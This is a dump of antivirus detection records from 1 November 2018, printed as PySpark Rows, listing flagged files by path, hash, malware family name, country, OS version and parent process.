  Row(detection=Row(filename='searchprotocolhost.exe', filepath='\\\\?\\C:\\Windows\\winsxs\\x86_windowssearchengine_31bf3856ad364e35_7.0.7601.23403_none_75f4c7b492ce2cb7\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='920b14c64024160f12e05747f3b2976ef33d16e4bcb83d447bc7fa0380007d70', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:34:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='\\\\?\\C:\\Windows\\winsxs\\x86_windowssearchengine_31bf3856ad364e35_7.0.7601.23403_none_75f4c7b492ce2cb7\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='920b14c64024160f12e05747f3b2976ef33d16e4bcb83d447bc7fa0380007d70', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:34:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='$r82jm5e', filepath='C:\\$Recycle.Bin\\S-1-5-21-1024011789-1237596223-2747892489-21661\\$R82JM5E', filesize=64000, name='VBA/Dldr.Agent.qydjb.#M1.#R1'), hash='9213945835b546068fe6f16eca3601a864e18182394e6af9baad8cc437babd70', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\totalcmd\\TOTALCMD64.EXE', parentsize=8694408, timestamp='2018-11-01T15:52:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-183200-479231e1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5a6b3617\\AVSCAN-20181101-183054-3DAB933E\\AVSCAN-20181101-183200-479231E1', filesize=64000, name='VBA/Dldr.Agent.qydjb.#M1.#R1'), hash='9213945835b546068fe6f16eca3601a864e18182394e6af9baad8cc437babd70', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T16:32:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='92262830e7f41b539562360618383f088ee18fd34aeb94466223f5e8440d70ff', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\92262830E7F41B539562360618383F088EE18FD34AEB94466223F5E8440D70FF', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='92262830e7f41b539562360618383f088ee18fd34aeb94466223f5e8440d70ff', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:08:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ptedit32.exe', filepath='I:\\BACKUPs--125GB\\Program Files\\Symantec\\Norton PartitionMagic 8.0\\RESCUEME\\DOSYSTEM\\PTEDIT32.EXE', filesize=512000, name='TR/Patched.Gen.#M300.#R2947'), hash='92370f2470ec2deb9200739fabb4edb783634d53a052710893053be98703ea24', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T23:47:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wuauserv.exe', filepath='C:\\Windows\\SysWOW64\\drivers\\UMDF\\tr-KL\\wuauserv.exe', filesize=448000, name='W32/Hlubea.Z.#M1.#R1'), hash='927986f56707e3dfe2adca5e4224417a764405e155f4ac1e60ddf7b6085c8c2c', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T04:56:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wuauserv.exe', filepath='C:\\Windows\\Temp\\msohtml\\wuauserv.exe', filesize=448000, name='W32/Hlubea.Z.#M1.#R1'), hash='927986f56707e3dfe2adca5e4224417a764405e155f4ac1e60ddf7b6085c8c2c', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\Microsoft.NET\\Framework64\\v3.0\\WPF\\PresentationFontCache.exe', parentsize=42840, timestamp='2018-11-01T04:27:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wuauserv.exe', filepath='C:\\Windows\\SysWOW64\\drivers\\UMDF\\tr-KL\\wuauserv.exe', filesize=448000, name='W32/Hlubea.Z.#M1.#R1'), hash='927986f56707e3dfe2adca5e4224417a764405e155f4ac1e60ddf7b6085c8c2c', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T08:22:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wuauserv.exe', filepath='\\\\?\\C:\\Windows\\Temp\\msohtml\\wuauserv.exe', filesize=448000, name='W32/Hlubea.Z.#M1.#R1'), hash='927986f56707e3dfe2adca5e4224417a764405e155f4ac1e60ddf7b6085c8c2c', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:30:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wuauserv.exe', filepath='C:\\Windows\\SysWOW64\\drivers\\UMDF\\tr-KL\\wuauserv.exe', filesize=448000, name='W32/Hlubea.Z.#M1.#R1'), hash='927986f56707e3dfe2adca5e4224417a764405e155f4ac1e60ddf7b6085c8c2c', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T21:47:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wuauserv.exe', filepath='C:\\Windows\\SysWOW64\\drivers\\UMDF\\tr-KL\\wuauserv.exe', filesize=448000, name='W32/Hlubea.Z.#M1.#R1'), hash='927986f56707e3dfe2adca5e4224417a764405e155f4ac1e60ddf7b6085c8c2c', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T06:38:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wuauserv.exe', filepath='C:\\Windows\\SysWOW64\\drivers\\UMDF\\tr-KL\\wuauserv.exe', filesize=448000, name='W32/Hlubea.Z.#M1.#R1'), hash='927986f56707e3dfe2adca5e4224417a764405e155f4ac1e60ddf7b6085c8c2c', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T18:47:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wuauserv.exe', filepath='C:\\Windows\\SysWOW64\\drivers\\UMDF\\tr-KL\\wuauserv.exe', filesize=448000, name='W32/Hlubea.Z.#M1.#R1'), hash='927986f56707e3dfe2adca5e4224417a764405e155f4ac1e60ddf7b6085c8c2c', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T13:54:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wuauserv.exe', filepath='C:\\Windows\\SysWOW64\\drivers\\UMDF\\tr-KL\\wuauserv.exe', filesize=448000, name='W32/Hlubea.Z.#M1.#R1'), hash='927986f56707e3dfe2adca5e4224417a764405e155f4ac1e60ddf7b6085c8c2c', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T17:47:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wuauserv.exe', filepath='C:\\Windows\\SysWOW64\\drivers\\UMDF\\tr-KL\\wuauserv.exe', filesize=448000, name='W32/Hlubea.Z.#M1.#R1'), hash='927986f56707e3dfe2adca5e4224417a764405e155f4ac1e60ddf7b6085c8c2c', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T10:28:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wuauserv.exe', filepath='C:\\Windows\\SysWOW64\\drivers\\UMDF\\tr-KL\\wuauserv.exe', filesize=448000, name='W32/Hlubea.Z.#M1.#R1'), hash='927986f56707e3dfe2adca5e4224417a764405e155f4ac1e60ddf7b6085c8c2c', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T11:44:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wuauserv.exe', filepath='C:\\Windows\\SysWOW64\\drivers\\UMDF\\tr-KL\\wuauserv.exe', filesize=448000, name='W32/Hlubea.Z.#M1.#R1'), hash='927986f56707e3dfe2adca5e4224417a764405e155f4ac1e60ddf7b6085c8c2c', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T12:44:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wuauserv.exe', filepath='C:\\Windows\\SysWOW64\\drivers\\UMDF\\tr-KL\\wuauserv.exe', filesize=448000, name='W32/Hlubea.Z.#M1.#R1'), hash='927986f56707e3dfe2adca5e4224417a764405e155f4ac1e60ddf7b6085c8c2c', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T14:59:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wuauserv.exe', filepath='C:\\Windows\\SysWOW64\\drivers\\UMDF\\tr-KL\\wuauserv.exe', filesize=448000, name='W32/Hlubea.Z.#M1.#R1'), hash='927986f56707e3dfe2adca5e4224417a764405e155f4ac1e60ddf7b6085c8c2c', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T19:47:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wuauserv.exe', filepath='C:\\Windows\\SysWOW64\\drivers\\UMDF\\tr-KL\\wuauserv.exe', filesize=448000, name='W32/Hlubea.Z.#M1.#R1'), hash='927986f56707e3dfe2adca5e4224417a764405e155f4ac1e60ddf7b6085c8c2c', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T23:48:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wuauserv.exe', filepath='C:\\Windows\\SysWOW64\\drivers\\UMDF\\tr-KL\\wuauserv.exe', filesize=448000, name='W32/Hlubea.Z.#M1.#R1'), hash='927986f56707e3dfe2adca5e4224417a764405e155f4ac1e60ddf7b6085c8c2c', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T20:47:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wuauserv.exe', filepath='C:\\Windows\\SysWOW64\\drivers\\UMDF\\tr-KL\\wuauserv.exe', filesize=448000, name='W32/Hlubea.Z.#M1.#R1'), hash='927986f56707e3dfe2adca5e4224417a764405e155f4ac1e60ddf7b6085c8c2c', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T16:21:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wuauserv.exe', filepath='C:\\Windows\\SysWOW64\\drivers\\UMDF\\tr-KL\\wuauserv.exe', filesize=448000, name='W32/Hlubea.Z.#M1.#R1'), hash='927986f56707e3dfe2adca5e4224417a764405e155f4ac1e60ddf7b6085c8c2c', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T22:48:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-214825-ed333690', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_632bd233\\AVSCAN-20181101-214038-A3F4827E\\AVSCAN-20181101-214825-ED333690', filesize=636000, name='TR/Agent.636000.#M1.#R1'), hash='92c50ba8d062d6ede7bdbfb9f1fd403ce323fbc58348d5e8d13f8ebb9506ce2b', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T19:48:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='blackshot_be.exe', filepath='\\?\\J:\\BlackShot\\System\\blackshot_BE.exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='93505dace6428368ee9b4216003976c4955612997b29218056b4135cb412d0f3', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:42:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maxxaudiocontrol.exe', filepath='F:\\Users\\X\\AppData\\Local\\Temp\\drp\\DP_Sounds_Realtek_13094\\drp\\FORCED\\NTx86\\7040\\MaxxAudioControl.exe', filesize=2912000, name='W32/Sality.AG.#M1.#R1'), hash='9350a0fc0253262229e6cc2cfbea6affb4c36f783b49a92245054c11d7a305c8', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T13:34:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maxxaudiocontrol.exe', filepath='F:\\Users\\X\\AppData\\Local\\Temp\\drp\\DP_Sounds_Realtek_13094\\drp\\FORCED\\NTx86\\7040\\MaxxAudioControl.exe', filesize=2912000, name='W32/Sality.AG.#M1.#R1'), hash='9350a0fc0253262229e6cc2cfbea6affb4c36f783b49a92245054c11d7a305c8', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T12:09:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maxxaudiocontrol.exe', filepath='F:\\Users\\X\\AppData\\Local\\Temp\\drp\\DP_Sounds_Realtek_13094\\drp\\FORCED\\NTx86\\7040\\MaxxAudioControl.exe', filesize=2912000, name='W32/Sality.AG.#M1.#R1'), hash='9350a0fc0253262229e6cc2cfbea6affb4c36f783b49a92245054c11d7a305c8', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T14:36:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='f15625248.dll', filepath='H:\\Downloads\\testdisk-7.0.win64\\testdisk-7.0\\recup_dir.9\\recup_dir.1\\recup_dir.60\\f15625248.dll', filesize=768000, name='PUA/OpenCandy.Gen.#M300.#R6753'), hash='9449b4422f2efed8894252b78b9412536f41285f229bdbfc3825114b84764907', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-01T08:08:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='adobe air application installer.exe', filepath='C:\\Program Files\\Common Files\\Adobe AIR\\Versions\\1.0\\Adobe AIR Application Installer.exe', filesize=72000, name='W32/Small.L.#M0.#R0'), hash='944e5569c61b5fc4a604ff731feb895b096d4aac47845669cf83c156bf0a1734', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T16:10:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='eetsqpnmt0.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\eeTsQpNmt0.exe', filesize=71984000, name='WORM/Lodbak.Gen.#M300.#R7829'), hash='94521c06bf99686d8902a798f7a102f120c49bd800b94d8b209a569ef7f4d690', metadata=Row(cmdline=None, country='MK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:13:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='spintires.exe', filepath='E:\\Spintires\\SpinTires.exe', filesize=8768000, name='W32/Ramnit.CD.#M1.#R1'), hash='9466ffe16e79b2ebf670be608b654c079eb5a38c305be9890bb5176eeecb6c92', metadata=Row(cmdline='--engine=2 --session-id=KU5\\\\\\/NVMmFspVb9nPIhYNQyA8XkaIEObG67OcpvZY --registry-suffix=ESET --extended-safebrowsing-enabled --chrome-version=70.0.3538.77 --chrome-channel=4 --enable-crash-reporting --srt-field-trial-group-name=NewCleanerUIExperiment', country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\35.178.200\\software_reporter_tool.exe', parentsize=12095608, timestamp='2018-11-01T18:35:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='94b00e30c8968aabd833cc71544a955f1d5cbfc2d1a4fdcdc38e06fbd3d94fa5', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_28.10.2018-5.available\\Avira\\94B00E30C8968AABD833CC71544A955F1D5CBFC2D1A4FDCDC38E06FBD3D94FA5', filesize=176000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='94b00e30c8968aabd833cc71544a955f1d5cbfc2d1a4fdcdc38e06fbd3d94fa5', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T11:31:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='94b00e30c8968aabd833cc71544a955f1d5cbfc2d1a4fdcdc38e06fbd3d94fa5', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_28.10.2018-5.available\\Avira\\94B00E30C8968AABD833CC71544A955F1D5CBFC2D1A4FDCDC38E06FBD3D94FA5', filesize=176000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='94b00e30c8968aabd833cc71544a955f1d5cbfc2d1a4fdcdc38e06fbd3d94fa5', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T11:31:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='1_5_10_4.html', filepath='C:\\Users\\This\\AppData\\Local\\VirtualStore\\Program Files (x86)\\Adobe\\Photoshop 7.0\\Help\\1_5_10_4.html', filesize=220000, name='VBS/Ramnit.abcd.#M0.#R0'), hash='94b3a6321554e84ddf30003a26b3548395657219dde3c215632f1b011a0b42f4', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T09:07:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='94fe5caf8a8304d08653725a9d34001b6fa6b9f50e03a1538810f52a68c05ab8', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T06:14:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='9524944a09910b877b6482cae7dc612265a2c9b46c7eeb5b5b47be9f2dc8041f', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_17.10.2018-22.available\\Avira\\9524944A09910B877B6482CAE7DC612265A2C9B46C7EEB5B5B47BE9F2DC8041F', filesize=1156000, name='PUA/SoftPulse.aonb.#M1.#R1'), hash='9524944a09910b877b6482cae7dc612265a2c9b46c7eeb5b5b47be9f2dc8041f', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T11:14:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='em000_32.dll', filepath='C:\\Program Files\\ESET\\ESET Internet Security\\Modules\\em000_32\\1029\\em000_32.dll', filesize=112000, name='TR/Crypt.XPACK.Gen.#M300.#R3761'), hash='95391fab785fadc038740c59bcb8c8e03216702ae5459f4793d2b0d83906ce78', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:11:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='em000_32.dll', filepath='D:\\Archivos de programa\\ESET\\ESET Security\\Modules\\em000_32\\1029\\em000_32.dll', filesize=112000, name='TR/Crypt.XPACK.Gen.#M300.#R3761'), hash='95391fab785fadc038740c59bcb8c8e03216702ae5459f4793d2b0d83906ce78', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:48:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='em000_32.dll', filepath='D:\\Archivos de programa\\ESET\\ESET Security\\Modules\\em000_32\\1029\\em000_32.dll', filesize=112000, name='TR/Crypt.XPACK.Gen.#M300.#R3761'), hash='95391fab785fadc038740c59bcb8c8e03216702ae5459f4793d2b0d83906ce78', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:16:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='em000_32.dll', filepath='C:\\Program Files\\ESET\\ESET Security\\Modules\\em000_32\\1029\\new_313D\\em000_32.dll', filesize=112000, name='TR/Crypt.XPACK.Gen.#M300.#R3761'), hash='95391fab785fadc038740c59bcb8c8e03216702ae5459f4793d2b0d83906ce78', metadata=Row(cmdline=None, country='CO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:05:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='em000_32.dll', filepath='C:\\Program Files\\ESET\\ESET Security\\Modules\\em000_32\\1029\\new_313D\\em000_32.dll', filesize=112000, name='TR/Crypt.XPACK.Gen.#M300.#R3761'), hash='95391fab785fadc038740c59bcb8c8e03216702ae5459f4793d2b0d83906ce78', metadata=Row(cmdline=None, country='CO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:05:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-080719-7a9aa183', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_444c4ab4\\AVSCAN-20181101-075651-38978B97\\AVSCAN-20181101-080719-7A9AA183', filesize=892000, name='ADWARE/Spigot.892000.#M1.#R1'), hash='9559dc925a2a572eeeff7b5d42e1aabe49cc80f1b149b4d09d9acd8e801ff827', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:07:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-081142-961791b7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_444c4ab4\\AVSCAN-20181101-075651-38978B97\\AVSCAN-20181101-081142-961791B7', filesize=892000, name='ADWARE/Spigot.892000.#M1.#R1'), hash='9559dc925a2a572eeeff7b5d42e1aabe49cc80f1b149b4d09d9acd8e801ff827', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:11:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-141410-fb0ae709', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a0197bd9\\AVSCAN-20181101-140354-BD0DC590\\AVSCAN-20181101-141410-FB0AE709', filesize=892000, name='ADWARE/Spigot.892000.#M1.#R1'), hash='9559dc925a2a572eeeff7b5d42e1aabe49cc80f1b149b4d09d9acd8e801ff827', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:14:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-141052-e7224d2f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a0197bd9\\AVSCAN-20181101-140354-BD0DC590\\AVSCAN-20181101-141052-E7224D2F', filesize=892000, name='ADWARE/Spigot.892000.#M1.#R1'), hash='9559dc925a2a572eeeff7b5d42e1aabe49cc80f1b149b4d09d9acd8e801ff827', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:10:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-080218-5af89817', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_444c4ab4\\AVSCAN-20181101-075651-38978B97\\AVSCAN-20181101-080218-5AF89817', filesize=892000, name='ADWARE/Spigot.892000.#M1.#R1'), hash='9559dc925a2a572eeeff7b5d42e1aabe49cc80f1b149b4d09d9acd8e801ff827', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:02:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-080518-6dd8c09b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_444c4ab4\\AVSCAN-20181101-075651-38978B97\\AVSCAN-20181101-080518-6DD8C09B', filesize=892000, name='ADWARE/Spigot.892000.#M1.#R1'), hash='9559dc925a2a572eeeff7b5d42e1aabe49cc80f1b149b4d09d9acd8e801ff827', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:05:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-141136-eb8d4a20', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a0197bd9\\AVSCAN-20181101-140354-BD0DC590\\AVSCAN-20181101-141136-EB8D4A20', filesize=892000, name='ADWARE/Spigot.892000.#M1.#R1'), hash='9559dc925a2a572eeeff7b5d42e1aabe49cc80f1b149b4d09d9acd8e801ff827', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:11:30Z'), dt=datetime.date(2018, 11, 1)),
